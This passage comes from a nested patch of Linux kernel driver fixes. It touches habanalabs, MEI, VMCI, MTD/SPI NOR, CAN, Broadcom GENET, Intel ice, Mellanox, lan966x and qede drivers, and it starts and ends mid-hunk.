++				(u64 *) ts_buff->user_buff_address + ts_offset;
++		requested_offset_record->cq_kernel_addr =
++				(u64 *) cq_cb->kernel_address + cq_offset;
++		requested_offset_record->cq_target_value = target_value;
++
+ 		spin_unlock_irqrestore(wait_list_lock, flags);
+ 	}
+ 
+-	/* Fill up the new registration node info */
+-	requested_offset_record->ts_reg_info.in_use = 1;
+-	requested_offset_record->ts_reg_info.buf = buf;
+-	requested_offset_record->ts_reg_info.cq_cb = cq_cb;
+-	requested_offset_record->ts_reg_info.timestamp_kernel_addr =
+-			(u64 *) ts_buff->user_buff_address + ts_offset;
+-	requested_offset_record->cq_kernel_addr =
+-			(u64 *) cq_cb->kernel_address + cq_offset;
+-	requested_offset_record->cq_target_value = target_value;
+-
+ 	*pend = requested_offset_record;
+ 
+ 	dev_dbg(buf->mmg->dev, "Found available node in TS kernel CB %p\n",
+@@ -3151,7 +3150,7 @@ static int _hl_interrupt_wait_ioctl(struct hl_device *hdev, struct hl_ctx *ctx,
+ 			goto put_cq_cb;
+ 		}
+ 
+-		/* Find first available record */
++		/* get ts buffer record */
+ 		rc = ts_buff_get_kernel_ts_record(buf, cq_cb, ts_offset,
+ 						cq_counters_offset, target_value,
+ 						&interrupt->wait_list_lock, &pend);
+@@ -3199,7 +3198,19 @@ static int _hl_interrupt_wait_ioctl(struct hl_device *hdev, struct hl_ctx *ctx,
+ 	 * Note that we cannot have sorted list by target value,
+ 	 * in order to shorten the list pass loop, since
+ 	 * same list could have nodes for different cq counter handle.
++	 * Note:
++	 * Mark ts buff offset as in use here in the spinlock protection area
++	 * to avoid getting in the re-use section in ts_buff_get_kernel_ts_record
++	 * before adding the node to the list. this scenario might happen when
++	 * multiple threads are racing on same offset and one thread could
++	 * set the ts buff in ts_buff_get_kernel_ts_record then the other thread
++	 * takes over and get to ts_buff_get_kernel_ts_record and then we will try
++	 * to re-use the same ts buff offset, and will try to delete a non existing
++	 * node from the list.
+ 	 */
++	if (register_ts_record)
++		pend->ts_reg_info.in_use = 1;
++
+ 	list_add_tail(&pend->wait_list_node, &interrupt->wait_list_head);
+ 	spin_unlock_irqrestore(&interrupt->wait_list_lock, flags);
+ 
+diff --git a/drivers/misc/habanalabs/common/device.c b/drivers/misc/habanalabs/common/device.c
+index 233d8b46c831f..e0dca445abf14 100644
+--- a/drivers/misc/habanalabs/common/device.c
++++ b/drivers/misc/habanalabs/common/device.c
+@@ -1458,7 +1458,8 @@ kill_processes:
+ 		if (rc == -EBUSY) {
+ 			if (hdev->device_fini_pending) {
+ 				dev_crit(hdev->dev,
+-					"Failed to kill all open processes, stopping hard reset\n");
++					"%s Failed to kill all open processes, stopping hard reset\n",
++					dev_name(&(hdev)->pdev->dev));
+ 				goto out_err;
+ 			}
+ 
+@@ -1468,7 +1469,8 @@ kill_processes:
+ 
+ 		if (rc) {
+ 			dev_crit(hdev->dev,
+-				"Failed to kill all open processes, stopping hard reset\n");
++				"%s Failed to kill all open processes, stopping hard reset\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			goto out_err;
+ 		}
+ 
+@@ -1519,14 +1521,16 @@ kill_processes:
+ 			 * ensure driver puts the driver in a unusable state
+ 			 */
+ 			dev_crit(hdev->dev,
+-				"Consecutive FW fatal errors received, stopping hard reset\n");
++				"%s Consecutive FW fatal errors received, stopping hard reset\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			rc = -EIO;
+ 			goto out_err;
+ 		}
+ 
+ 		if (hdev->kernel_ctx) {
+ 			dev_crit(hdev->dev,
+-				"kernel ctx was alive during hard reset, something is terribly wrong\n");
++				"%s kernel ctx was alive during hard reset, something is terribly wrong\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			rc = -EBUSY;
+ 			goto out_err;
+ 		}
+@@ -1645,9 +1649,13 @@ kill_processes:
+ 	hdev->reset_info.needs_reset = false;
+ 
+ 	if (hard_reset)
+-		dev_info(hdev->dev, "Successfully finished resetting the device\n");
++		dev_info(hdev->dev,
++			 "Successfully finished resetting the %s device\n",
++			 dev_name(&(hdev)->pdev->dev));
+ 	else
+-		dev_dbg(hdev->dev, "Successfully finished resetting the device\n");
++		dev_dbg(hdev->dev,
++			"Successfully finished resetting the %s device\n",
++			dev_name(&(hdev)->pdev->dev));
+ 
+ 	if (hard_reset) {
+ 		hdev->reset_info.hard_reset_cnt++;
+@@ -1681,7 +1689,9 @@ out_err:
+ 	hdev->reset_info.in_compute_reset = 0;
+ 
+ 	if (hard_reset) {
+-		dev_err(hdev->dev, "Failed to reset! Device is NOT usable\n");
++		dev_err(hdev->dev,
++			"%s Failed to reset! Device is NOT usable\n",
++			dev_name(&(hdev)->pdev->dev));
+ 		hdev->reset_info.hard_reset_cnt++;
+ 	} else if (reset_upon_device_release) {
+ 		spin_unlock(&hdev->reset_info.lock);
+@@ -2004,7 +2014,8 @@ int hl_device_init(struct hl_device *hdev, struct class *hclass)
+ 	}
+ 
+ 	dev_notice(hdev->dev,
+-		"Successfully added device to habanalabs driver\n");
++		"Successfully added device %s to habanalabs driver\n",
++		dev_name(&(hdev)->pdev->dev));
+ 
+ 	hdev->init_done = true;
+ 
+@@ -2053,11 +2064,11 @@ out_disabled:
+ 		device_cdev_sysfs_add(hdev);
+ 	if (hdev->pdev)
+ 		dev_err(&hdev->pdev->dev,
+-			"Failed to initialize hl%d. Device is NOT usable !\n",
+-			hdev->cdev_idx);
++			"Failed to initialize hl%d. Device %s is NOT usable !\n",
++			hdev->cdev_idx, dev_name(&(hdev)->pdev->dev));
+ 	else
+-		pr_err("Failed to initialize hl%d. Device is NOT usable !\n",
+-			hdev->cdev_idx);
++		pr_err("Failed to initialize hl%d. Device %s is NOT usable !\n",
++			hdev->cdev_idx, dev_name(&(hdev)->pdev->dev));
+ 
+ 	return rc;
+ }
+@@ -2113,7 +2124,8 @@ void hl_device_fini(struct hl_device *hdev)
+ 
+ 		if (ktime_compare(ktime_get(), timeout) > 0) {
+ 			dev_crit(hdev->dev,
+-				"Failed to remove device because reset function did not finish\n");
++				"%s Failed to remove device because reset function did not finish\n",
++				dev_name(&(hdev)->pdev->dev));
+ 			return;
+ 		}
+ 	}
+diff --git a/drivers/misc/habanalabs/common/memory.c b/drivers/misc/habanalabs/common/memory.c
+index ef28f3b37b932..a49038da3f6d0 100644
+--- a/drivers/misc/habanalabs/common/memory.c
++++ b/drivers/misc/habanalabs/common/memory.c
+@@ -2089,12 +2089,13 @@ static int hl_ts_mmap(struct hl_mmap_mem_buf *buf, struct vm_area_struct *vma, v
+ static int hl_ts_alloc_buf(struct hl_mmap_mem_buf *buf, gfp_t gfp, void *args)
+ {
+ 	struct hl_ts_buff *ts_buff = NULL;
+-	u32 size, num_elements;
++	u32 num_elements;
++	size_t size;
+ 	void *p;
+ 
+ 	num_elements = *(u32 *)args;
+ 
+-	ts_buff = kzalloc(sizeof(*ts_buff), GFP_KERNEL);
++	ts_buff = kzalloc(sizeof(*ts_buff), gfp);
+ 	if (!ts_buff)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/misc/mei/hdcp/mei_hdcp.c b/drivers/misc/mei/hdcp/mei_hdcp.c
+index e889a8bd7ac88..e0dcd5c114db1 100644
+--- a/drivers/misc/mei/hdcp/mei_hdcp.c
++++ b/drivers/misc/mei/hdcp/mei_hdcp.c
+@@ -859,8 +859,8 @@ static void mei_hdcp_remove(struct mei_cl_device *cldev)
+ 		dev_warn(&cldev->dev, "mei_cldev_disable() failed\n");
+ }
+ 
+-#define MEI_UUID_HDCP GUID_INIT(0xB638AB7E, 0x94E2, 0x4EA2, 0xA5, \
+-				0x52, 0xD1, 0xC5, 0x4B, 0x62, 0x7F, 0x04)
++#define MEI_UUID_HDCP UUID_LE(0xB638AB7E, 0x94E2, 0x4EA2, 0xA5, \
++			      0x52, 0xD1, 0xC5, 0x4B, 0x62, 0x7F, 0x04)
+ 
+ static const struct mei_cl_device_id mei_hdcp_tbl[] = {
+ 	{ .uuid = MEI_UUID_HDCP, .version = MEI_CL_VERSION_ANY },
+diff --git a/drivers/misc/mei/pxp/mei_pxp.c b/drivers/misc/mei/pxp/mei_pxp.c
+index 5c39457e3f53d..412b2d91d9459 100644
+--- a/drivers/misc/mei/pxp/mei_pxp.c
++++ b/drivers/misc/mei/pxp/mei_pxp.c
+@@ -206,8 +206,8 @@ static void mei_pxp_remove(struct mei_cl_device *cldev)
+ }
+ 
+ /* fbf6fcf1-96cf-4e2e-a6a6-1bab8cbe36b1 : PAVP GUID*/
+-#define MEI_GUID_PXP GUID_INIT(0xfbf6fcf1, 0x96cf, 0x4e2e, 0xA6, \
+-			       0xa6, 0x1b, 0xab, 0x8c, 0xbe, 0x36, 0xb1)
++#define MEI_GUID_PXP UUID_LE(0xfbf6fcf1, 0x96cf, 0x4e2e, 0xA6, \
++			     0xa6, 0x1b, 0xab, 0x8c, 0xbe, 0x36, 0xb1)
+ 
+ static struct mei_cl_device_id mei_pxp_tbl[] = {
+ 	{ .uuid = MEI_GUID_PXP, .version = MEI_CL_VERSION_ANY },
+diff --git a/drivers/misc/vmw_vmci/vmci_host.c b/drivers/misc/vmw_vmci/vmci_host.c
+index da1e2a773823e..857b9851402a6 100644
+--- a/drivers/misc/vmw_vmci/vmci_host.c
++++ b/drivers/misc/vmw_vmci/vmci_host.c
+@@ -242,6 +242,8 @@ static int vmci_host_setup_notify(struct vmci_ctx *context,
+ 		context->notify_page = NULL;
+ 		return VMCI_ERROR_GENERIC;
+ 	}
++	if (context->notify_page == NULL)
++		return VMCI_ERROR_UNAVAILABLE;
+ 
+ 	/*
+ 	 * Map the locked page and set up notify pointer.
+diff --git a/drivers/mtd/mtdpart.c b/drivers/mtd/mtdpart.c
+index d442fa94c8720..85f5ee6f06fc6 100644
+--- a/drivers/mtd/mtdpart.c
++++ b/drivers/mtd/mtdpart.c
+@@ -577,6 +577,7 @@ static int mtd_part_of_parse(struct mtd_info *master,
+ {
+ 	struct mtd_part_parser *parser;
+ 	struct device_node *np;
++	struct device_node *child;
+ 	struct property *prop;
+ 	struct device *dev;
+ 	const char *compat;
+@@ -594,6 +595,15 @@ static int mtd_part_of_parse(struct mtd_info *master,
+ 	else
+ 		np = of_get_child_by_name(np, "partitions");
+ 
++	/*
++	 * Don't create devices that are added to a bus but will never get
++	 * probed. That'll cause fw_devlink to block probing of consumers of
++	 * this partition until the partition device is probed.
++	 */
++	for_each_child_of_node(np, child)
++		if (of_device_is_compatible(child, "nvmem-cells"))
++			of_node_set_flag(child, OF_POPULATED);
++
+ 	of_property_for_each_string(np, "compatible", prop, compat) {
+ 		parser = mtd_part_get_compatible_parser(compat);
+ 		if (!parser)
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index 5dbf52aa03551..cda57cb863089 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -2003,6 +2003,15 @@ void spi_nor_set_erase_type(struct spi_nor_erase_type *erase, u32 size,
+ 	erase->size_mask = (1 << erase->size_shift) - 1;
+ }
+ 
++/**
++ * spi_nor_mask_erase_type() - mask out a SPI NOR erase type
++ * @erase:	pointer to a structure that describes a SPI NOR erase type
++ */
++void spi_nor_mask_erase_type(struct spi_nor_erase_type *erase)
++{
++	erase->size = 0;
++}
++
+ /**
+  * spi_nor_init_uniform_erase_map() - Initialize uniform erase map
+  * @map:		the erase map of the SPI NOR
+diff --git a/drivers/mtd/spi-nor/core.h b/drivers/mtd/spi-nor/core.h
+index 85b0cf254e974..d18dafeb020ab 100644
+--- a/drivers/mtd/spi-nor/core.h
++++ b/drivers/mtd/spi-nor/core.h
+@@ -682,6 +682,7 @@ void spi_nor_set_pp_settings(struct spi_nor_pp_command *pp, u8 opcode,
+ 
+ void spi_nor_set_erase_type(struct spi_nor_erase_type *erase, u32 size,
+ 			    u8 opcode);
++void spi_nor_mask_erase_type(struct spi_nor_erase_type *erase);
+ struct spi_nor_erase_region *
+ spi_nor_region_next(struct spi_nor_erase_region *region);
+ void spi_nor_init_uniform_erase_map(struct spi_nor_erase_map *map,
+diff --git a/drivers/mtd/spi-nor/sfdp.c b/drivers/mtd/spi-nor/sfdp.c
+index 2257f1b4c2e2d..78110387be0b5 100644
+--- a/drivers/mtd/spi-nor/sfdp.c
++++ b/drivers/mtd/spi-nor/sfdp.c
+@@ -876,7 +876,7 @@ static int spi_nor_init_non_uniform_erase_map(struct spi_nor *nor,
+ 	 */
+ 	for (i = 0; i < SNOR_ERASE_TYPE_MAX; i++)
+ 		if (!(regions_erase_type & BIT(erase[i].idx)))
+-			spi_nor_set_erase_type(&erase[i], 0, 0xFF);
++			spi_nor_mask_erase_type(&erase[i]);
+ 
+ 	return 0;
+ }
+@@ -1090,7 +1090,7 @@ static int spi_nor_parse_4bait(struct spi_nor *nor,
+ 			erase_type[i].opcode = (dwords[1] >>
+ 						erase_type[i].idx * 8) & 0xFF;
+ 		else
+-			spi_nor_set_erase_type(&erase_type[i], 0u, 0xFF);
++			spi_nor_mask_erase_type(&erase_type[i]);
+ 	}
+ 
+ 	/*
+@@ -1222,7 +1222,7 @@ static int spi_nor_parse_sccr(struct spi_nor *nor,
+ 
+ 	le32_to_cpu_array(dwords, sccr_header->length);
+ 
+-	if (FIELD_GET(SCCR_DWORD22_OCTAL_DTR_EN_VOLATILE, dwords[22]))
++	if (FIELD_GET(SCCR_DWORD22_OCTAL_DTR_EN_VOLATILE, dwords[21]))
+ 		nor->flags |= SNOR_F_IO_MODE_EN_VOLATILE;
+ 
+ out:
+diff --git a/drivers/mtd/spi-nor/spansion.c b/drivers/mtd/spi-nor/spansion.c
+index 0150049007be1..7ac2ad1a8d576 100644
+--- a/drivers/mtd/spi-nor/spansion.c
++++ b/drivers/mtd/spi-nor/spansion.c
+@@ -21,8 +21,13 @@
+ #define SPINOR_REG_CYPRESS_CFR3V		0x00800004
+ #define SPINOR_REG_CYPRESS_CFR3V_PGSZ		BIT(4) /* Page size. */
+ #define SPINOR_REG_CYPRESS_CFR5V		0x00800006
+-#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_EN	0x3
+-#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_DS	0
++#define SPINOR_REG_CYPRESS_CFR5_BIT6		BIT(6)
++#define SPINOR_REG_CYPRESS_CFR5_DDR		BIT(1)
++#define SPINOR_REG_CYPRESS_CFR5_OPI		BIT(0)
++#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_EN				\
++	(SPINOR_REG_CYPRESS_CFR5_BIT6 |	SPINOR_REG_CYPRESS_CFR5_DDR |	\
++	 SPINOR_REG_CYPRESS_CFR5_OPI)
++#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_DS	SPINOR_REG_CYPRESS_CFR5_BIT6
+ #define SPINOR_OP_CYPRESS_RD_FAST		0xee
+ 
+ /* Cypress SPI NOR flash operations. */
+diff --git a/drivers/net/can/rcar/rcar_canfd.c b/drivers/net/can/rcar/rcar_canfd.c
+index b306cf554634f..e68291697c33f 100644
+--- a/drivers/net/can/rcar/rcar_canfd.c
++++ b/drivers/net/can/rcar/rcar_canfd.c
+@@ -98,10 +98,10 @@ enum rcanfd_chip_id {
+ /* RSCFDnCFDGAFLCFG0 / RSCFDnGAFLCFG0 */
+ #define RCANFD_GAFLCFG_SETRNC(gpriv, n, x) \
+ 	(((x) & reg_v3u(gpriv, 0x1ff, 0xff)) << \
+-	 (reg_v3u(gpriv, 16, 24) - (n) * reg_v3u(gpriv, 16, 8)))
++	 (reg_v3u(gpriv, 16, 24) - ((n) & 1) * reg_v3u(gpriv, 16, 8)))
+ 
+ #define RCANFD_GAFLCFG_GETRNC(gpriv, n, x) \
+-	(((x) >> (reg_v3u(gpriv, 16, 24) - (n) * reg_v3u(gpriv, 16, 8))) & \
++	(((x) >> (reg_v3u(gpriv, 16, 24) - ((n) & 1) * reg_v3u(gpriv, 16, 8))) & \
+ 	 reg_v3u(gpriv, 0x1ff, 0xff))
+ 
+ /* RSCFDnCFDGAFLECTR / RSCFDnGAFLECTR */
+diff --git a/drivers/net/can/usb/esd_usb.c b/drivers/net/can/usb/esd_usb.c
+index 42323f5e6f3a0..578b25f873e58 100644
+--- a/drivers/net/can/usb/esd_usb.c
++++ b/drivers/net/can/usb/esd_usb.c
+@@ -239,41 +239,42 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 			   msg->msg.rx.dlc, state, ecc, rxerr, txerr);
+ 
+ 		skb = alloc_can_err_skb(priv->netdev, &cf);
+-		if (skb == NULL) {
+-			stats->rx_dropped++;
+-			return;
+-		}
+ 
+ 		if (state != priv->old_state) {
++			enum can_state tx_state, rx_state;
++			enum can_state new_state = CAN_STATE_ERROR_ACTIVE;
++
+ 			priv->old_state = state;
+ 
+ 			switch (state & ESD_BUSSTATE_MASK) {
+ 			case ESD_BUSSTATE_BUSOFF:
+-				priv->can.state = CAN_STATE_BUS_OFF;
+-				cf->can_id |= CAN_ERR_BUSOFF;
+-				priv->can.can_stats.bus_off++;
++				new_state = CAN_STATE_BUS_OFF;
+ 				can_bus_off(priv->netdev);
+ 				break;
+ 			case ESD_BUSSTATE_WARN:
+-				priv->can.state = CAN_STATE_ERROR_WARNING;
+-				priv->can.can_stats.error_warning++;
++				new_state = CAN_STATE_ERROR_WARNING;
+ 				break;
+ 			case ESD_BUSSTATE_ERRPASSIVE:
+-				priv->can.state = CAN_STATE_ERROR_PASSIVE;
+-				priv->can.can_stats.error_passive++;
++				new_state = CAN_STATE_ERROR_PASSIVE;
+ 				break;
+ 			default:
+-				priv->can.state = CAN_STATE_ERROR_ACTIVE;
++				new_state = CAN_STATE_ERROR_ACTIVE;
+ 				txerr = 0;
+ 				rxerr = 0;
+ 				break;
+ 			}
+-		} else {
++
++			if (new_state != priv->can.state) {
++				tx_state = (txerr >= rxerr) ? new_state : 0;
++				rx_state = (txerr <= rxerr) ? new_state : 0;
++				can_change_state(priv->netdev, cf,
++						 tx_state, rx_state);
++			}
++		} else if (skb) {
+ 			priv->can.can_stats.bus_error++;
+ 			stats->rx_errors++;
+ 
+-			cf->can_id |= CAN_ERR_PROT | CAN_ERR_BUSERROR |
+-				      CAN_ERR_CNT;
++			cf->can_id |= CAN_ERR_PROT | CAN_ERR_BUSERROR;
+ 
+ 			switch (ecc & SJA1000_ECC_MASK) {
+ 			case SJA1000_ECC_BIT:
+@@ -286,7 +287,6 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 				cf->data[2] |= CAN_ERR_PROT_STUFF;
+ 				break;
+ 			default:
+-				cf->data[3] = ecc & SJA1000_ECC_SEG;
+ 				break;
+ 			}
+ 
+@@ -294,20 +294,22 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 			if (!(ecc & SJA1000_ECC_DIR))
+ 				cf->data[2] |= CAN_ERR_PROT_TX;
+ 
+-			if (priv->can.state == CAN_STATE_ERROR_WARNING ||
+-			    priv->can.state == CAN_STATE_ERROR_PASSIVE) {
+-				cf->data[1] = (txerr > rxerr) ?
+-					CAN_ERR_CRTL_TX_PASSIVE :
+-					CAN_ERR_CRTL_RX_PASSIVE;
+-			}
+-			cf->data[6] = txerr;
+-			cf->data[7] = rxerr;
++			/* Bit stream position in CAN frame as the error was detected */
++			cf->data[3] = ecc & SJA1000_ECC_SEG;
+ 		}
+ 
+ 		priv->bec.txerr = txerr;
+ 		priv->bec.rxerr = rxerr;
+ 
+-		netif_rx(skb);
++		if (skb) {
++			cf->can_id |= CAN_ERR_CNT;
++			cf->data[6] = txerr;
++			cf->data[7] = rxerr;
++
++			netif_rx(skb);
++		} else {
++			stats->rx_dropped++;
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index 25c4506069856..f679ed54b3ef2 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -2311,6 +2311,14 @@ static unsigned int bcmgenet_desc_rx(struct bcmgenet_rx_ring *ring,
+ 			  __func__, p_index, ring->c_index,
+ 			  ring->read_ptr, dma_length_status);
+ 
++		if (unlikely(len > RX_BUF_LENGTH)) {
++			netif_err(priv, rx_status, dev, "oversized packet\n");
++			dev->stats.rx_length_errors++;
++			dev->stats.rx_errors++;
++			dev_kfree_skb_any(skb);
++			goto next;
++		}
++
+ 		if (unlikely(!(dma_flag & DMA_EOP) || !(dma_flag & DMA_SOP))) {
+ 			netif_err(priv, rx_status, dev,
+ 				  "dropping fragmented packet!\n");
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index 7ded559842e83..ded0e64a9f6a1 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -169,15 +169,6 @@ void bcmgenet_phy_power_set(struct net_device *dev, bool enable)
+ 
+ static void bcmgenet_moca_phy_setup(struct bcmgenet_priv *priv)
+ {
+-	u32 reg;
+-
+-	if (!GENET_IS_V5(priv)) {
+-		/* Speed settings are set in bcmgenet_mii_setup() */
+-		reg = bcmgenet_sys_readl(priv, SYS_PORT_CTRL);
+-		reg |= LED_ACT_SOURCE_MAC;
+-		bcmgenet_sys_writel(priv, reg, SYS_PORT_CTRL);
+-	}
+-
+ 	if (priv->hw_params->flags & GENET_HAS_MOCA_LINK_DET)
+ 		fixed_phy_set_link_update(priv->dev->phydev,
+ 					  bcmgenet_fixed_phy_link_update);
+@@ -210,6 +201,8 @@ int bcmgenet_mii_config(struct net_device *dev, bool init)
+ 
+ 		if (!phy_name) {
+ 			phy_name = "MoCA";
++			if (!GENET_IS_V5(priv))
++				port_ctrl |= LED_ACT_SOURCE_MAC;
+ 			bcmgenet_moca_phy_setup(priv);
+ 		}
+ 		break;
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 72f97bb50b09c..3c6bb3f9ac780 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -6159,15 +6159,12 @@ int ice_vsi_cfg(struct ice_vsi *vsi)
+ {
+ 	int err;
+ 
+-	if (vsi->netdev) {
++	if (vsi->netdev && vsi->type == ICE_VSI_PF) {
+ 		ice_set_rx_mode(vsi->netdev);
+ 
+-		if (vsi->type != ICE_VSI_LB) {
+-			err = ice_vsi_vlan_setup(vsi);
+-
+-			if (err)
+-				return err;
+-		}
++		err = ice_vsi_vlan_setup(vsi);
++		if (err)
++			return err;
+ 	}
+ 	ice_vsi_cfg_dcb_rings(vsi);
+ 
+@@ -6348,7 +6345,7 @@ static int ice_up_complete(struct ice_vsi *vsi)
+ 
+ 	if (vsi->port_info &&
+ 	    (vsi->port_info->phy.link_info.link_info & ICE_AQ_LINK_UP) &&
+-	    vsi->netdev) {
++	    vsi->netdev && vsi->type == ICE_VSI_PF) {
+ 		ice_print_link_msg(vsi, true);
+ 		netif_tx_start_all_queues(vsi->netdev);
+ 		netif_carrier_on(vsi->netdev);
+@@ -6360,7 +6357,9 @@ static int ice_up_complete(struct ice_vsi *vsi)
+ 	 * set the baseline so counters are ready when interface is up
+ 	 */
+ 	ice_update_eth_stats(vsi);
+-	ice_service_task_schedule(pf);
++
++	if (vsi->type == ICE_VSI_PF)
++		ice_service_task_schedule(pf);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c
+index 53fec5bbe6e00..a3585ede829bb 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.c
+@@ -2293,7 +2293,7 @@ static void ice_ptp_set_caps(struct ice_pf *pf)
+ 	snprintf(info->name, sizeof(info->name) - 1, "%s-%s-clk",
+ 		 dev_driver_string(dev), dev_name(dev));
+ 	info->owner = THIS_MODULE;
+-	info->max_adj = 999999999;
++	info->max_adj = 100000000;
+ 	info->adjtime = ice_ptp_adjtime;
+ 	info->adjfine = ice_ptp_adjfine;
+ 	info->gettimex64 = ice_ptp_gettimex64;
+diff --git a/drivers/net/ethernet/mellanox/mlx4/en_tx.c b/drivers/net/ethernet/mellanox/mlx4/en_tx.c
+index 43a4102e9c091..7fccf1a79f09b 100644
+--- a/drivers/net/ethernet/mellanox/mlx4/en_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx4/en_tx.c
+@@ -697,32 +697,32 @@ static void build_inline_wqe(struct mlx4_en_tx_desc *tx_desc,
+ 			inl->byte_count = cpu_to_be32(1 << 31 | skb->len);
+ 		} else {
+ 			inl->byte_count = cpu_to_be32(1 << 31 | MIN_PKT_LEN);
+-			memset(((void *)(inl + 1)) + skb->len, 0,
++			memset(inl->data + skb->len, 0,
+ 			       MIN_PKT_LEN - skb->len);
+ 		}
+-		skb_copy_from_linear_data(skb, inl + 1, hlen);
++		skb_copy_from_linear_data(skb, inl->data, hlen);
+ 		if (shinfo->nr_frags)
+-			memcpy(((void *)(inl + 1)) + hlen, fragptr,
++			memcpy(inl->data + hlen, fragptr,
+ 			       skb_frag_size(&shinfo->frags[0]));
+ 
+ 	} else {
+ 		inl->byte_count = cpu_to_be32(1 << 31 | spc);
+ 		if (hlen <= spc) {
+-			skb_copy_from_linear_data(skb, inl + 1, hlen);
++			skb_copy_from_linear_data(skb, inl->data, hlen);
+ 			if (hlen < spc) {
+-				memcpy(((void *)(inl + 1)) + hlen,
++				memcpy(inl->data + hlen,
+ 				       fragptr, spc - hlen);
+ 				fragptr +=  spc - hlen;
+ 			}
+-			inl = (void *) (inl + 1) + spc;
+-			memcpy(((void *)(inl + 1)), fragptr, skb->len - spc);
++			inl = (void *)inl->data + spc;
++			memcpy(inl->data, fragptr, skb->len - spc);
+ 		} else {
+-			skb_copy_from_linear_data(skb, inl + 1, spc);
+-			inl = (void *) (inl + 1) + spc;
+-			skb_copy_from_linear_data_offset(skb, spc, inl + 1,
++			skb_copy_from_linear_data(skb, inl->data, spc);
++			inl = (void *)inl->data + spc;
++			skb_copy_from_linear_data_offset(skb, spc, inl->data,
+ 							 hlen - spc);
+ 			if (shinfo->nr_frags)
+-				memcpy(((void *)(inl + 1)) + hlen - spc,
++				memcpy(inl->data + hlen - spc,
+ 				       fragptr,
+ 				       skb_frag_size(&shinfo->frags[0]));
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index 5b05b884b5fb3..d7b2ee5de1158 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -603,7 +603,7 @@ static int mlx5_tracer_handle_string_trace(struct mlx5_fw_tracer *tracer,
+ 	} else {
+ 		cur_string = mlx5_tracer_message_get(tracer, tracer_event);
+ 		if (!cur_string) {
+-			pr_debug("%s Got string event for unknown string tdsm: %d\n",
++			pr_debug("%s Got string event for unknown string tmsn: %d\n",
+ 				 __func__, tracer_event->string_event.tmsn);
+ 			return -1;
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 0eb50be175cc4..64d4e7125e9bb 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -219,7 +219,8 @@ static int alloc_4k(struct mlx5_core_dev *dev, u64 *addr, u32 function)
+ 
+ 	n = find_first_bit(&fp->bitmask, 8 * sizeof(fp->bitmask));
+ 	if (n >= MLX5_NUM_4K_IN_PAGE) {
+-		mlx5_core_warn(dev, "alloc 4k bug\n");
++		mlx5_core_warn(dev, "alloc 4k bug: fw page = 0x%llx, n = %u, bitmask: %lu, max num of 4K pages: %d\n",
++			       fp->addr, n, fp->bitmask,  MLX5_NUM_4K_IN_PAGE);
+ 		return -ENOENT;
+ 	}
+ 	clear_bit(n, &fp->bitmask);
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+index 8e368318558ac..0a0e233f36ab0 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+@@ -304,9 +304,9 @@ irqreturn_t lan966x_ptp_irq_handler(int irq, void *args)
+ 		if (WARN_ON(!skb_match))
+ 			continue;
+ 
+-		spin_lock(&lan966x->ptp_ts_id_lock);
++		spin_lock_irqsave(&lan966x->ptp_ts_id_lock, flags);
+ 		lan966x->ptp_skbs--;
+-		spin_unlock(&lan966x->ptp_ts_id_lock);
++		spin_unlock_irqrestore(&lan966x->ptp_ts_id_lock, flags);
+ 
+ 		/* Get the h/w timestamp */
+ 		lan966x_get_hwtimestamp(lan966x, &ts, delay);
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_main.c b/drivers/net/ethernet/qlogic/qede/qede_main.c
+index 953f304b8588c..89d64a5a4951a 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_main.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_main.c
+@@ -960,7 +960,6 @@ static int qede_alloc_fp_array(struct qede_dev *edev)
+ {
+ 	u8 fp_combined, fp_rx = edev->fp_num_rx;
+ 	struct qede_fastpath *fp;
+-	void *mem;
+ 	int i;
+ 
+ 	edev->fp_array = kcalloc(QEDE_QUEUE_CNT(edev),
